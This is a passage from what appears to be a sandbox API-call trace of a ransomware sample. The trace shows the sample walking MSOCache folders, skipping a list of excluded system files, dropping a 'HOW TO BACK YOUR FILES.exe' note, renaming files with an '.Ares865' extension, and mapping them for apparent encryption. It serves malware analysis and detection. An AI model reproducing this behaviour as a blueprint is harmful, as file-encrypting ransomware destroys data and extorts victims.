nFileSizeLow=0x29c6dbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="aoldtz.exe") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2=".") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="..") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="windows") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="bootmgr") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="temp") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="pagefile.sys") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="boot") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="ids.txt") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="ntuser.dat") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="perflogs") returned 1 [0078.397] lstrcmpiW (lpString1="WordLR.cab", lpString2="MSBuild") returned 1 [0078.397] lstrlenW (lpString="WordLR.cab") returned 10 [0078.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0078.397] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="aoldtz.exe") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2=".") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="..") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="windows") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="bootmgr") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="temp") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="pagefile.sys") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="boot") returned 1 [0078.397] lstrcmpiW (lpString1="WordMUI.msi", lpString2="ids.txt") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.msi", lpString2="ntuser.dat") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.msi", lpString2="perflogs") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.msi", lpString2="MSBuild") returned 1 [0078.398] lstrlenW (lpString="WordMUI.msi") returned 11 [0078.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0078.398] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="aoldtz.exe") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2=".") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="..") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="windows") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="bootmgr") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="temp") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="pagefile.sys") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="boot") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="ids.txt") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="ntuser.dat") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="perflogs") returned 1 [0078.398] lstrcmpiW (lpString1="WordMUI.xml", lpString2="MSBuild") returned 1 [0078.398] lstrlenW (lpString="WordMUI.xml") returned 11 [0078.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0078.398] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.Ares865") returned 82 [0078.398] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.ares865"), dwFlags=0x1) returned 1 [0078.399] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.399] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1800) returned 1 [0078.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0078.400] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0160) returned 1 [0078.400] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.400] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0078.401] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa10, lpName=0x0) returned 0xa4 [0078.402] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa10) returned 0x190000 [0078.403] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0160) returned 1 [0078.403] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.403] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0078.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.404] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.404] CloseHandle (hObject=0xa4) returned 1 [0078.404] CloseHandle (hObject=0x15c) returned 1 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.404] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0078.404] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0078.404] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2608 [0078.404] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C" [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0078.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0078.405] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned 62 [0078.405] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C" [0078.405] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.405] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.409] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.409] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x603d7200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x603d7200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.409] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.409] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.410] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x603d7200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x603d7200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.410] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.410] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.410] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.410] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.410] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x603d7200, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x603d7200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0078.410] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0078.410] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="aoldtz.exe") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2=".") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="..") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="windows") returned -1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="bootmgr") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="temp") returned -1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="pagefile.sys") returned -1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="boot") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="ids.txt") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="ntuser.dat") returned 1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="perflogs") returned -1 [0078.410] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="MSBuild") returned 1 [0078.410] lstrlenW (lpString="OutlkLR.cab") returned 11 [0078.410] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*") returned 64 [0078.410] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0078.410] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.410] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="aoldtz.exe") returned 1 [0078.410] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2=".") returned 1 [0078.410] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="..") returned 1 [0078.410] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="windows") returned -1 [0078.410] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="bootmgr") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="temp") returned -1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="pagefile.sys") returned -1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="boot") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="ids.txt") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="ntuser.dat") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="perflogs") returned -1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="MSBuild") returned 1 [0078.411] lstrlenW (lpString="OutlookMUI.msi") returned 14 [0078.411] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0078.411] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="aoldtz.exe") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2=".") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="..") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="windows") returned -1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="bootmgr") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="temp") returned -1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="pagefile.sys") returned -1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="boot") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="ids.txt") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="ntuser.dat") returned 1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="perflogs") returned -1 [0078.411] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="MSBuild") returned 1 [0078.411] lstrlenW (lpString="OutlookMUI.xml") returned 14 [0078.411] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0078.411] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.Ares865") returned 85 [0078.411] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.ares865"), dwFlags=0x1) returned 1 [0078.412] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3186) returned 1 [0078.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0078.413] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0078.413] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.413] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0078.413] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf80, lpName=0x0) returned 0xa4 [0078.415] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf80) returned 0x190000 [0078.416] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0078.417] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.417] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0078.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0078.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0078.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.417] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0078.417] CloseHandle (hObject=0xa4) returned 1 [0078.417] CloseHandle (hObject=0x118) returned 1 [0078.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0078.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.418] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="aoldtz.exe") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="bootmgr") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="temp") returned -1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="pagefile.sys") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="boot") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="ids.txt") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="perflogs") returned 1 [0078.418] lstrcmpiW (lpString1="Setup.xml", lpString2="MSBuild") returned 1 [0078.418] lstrlenW (lpString="Setup.xml") returned 9 [0078.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77 [0078.418] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.418] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.419] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 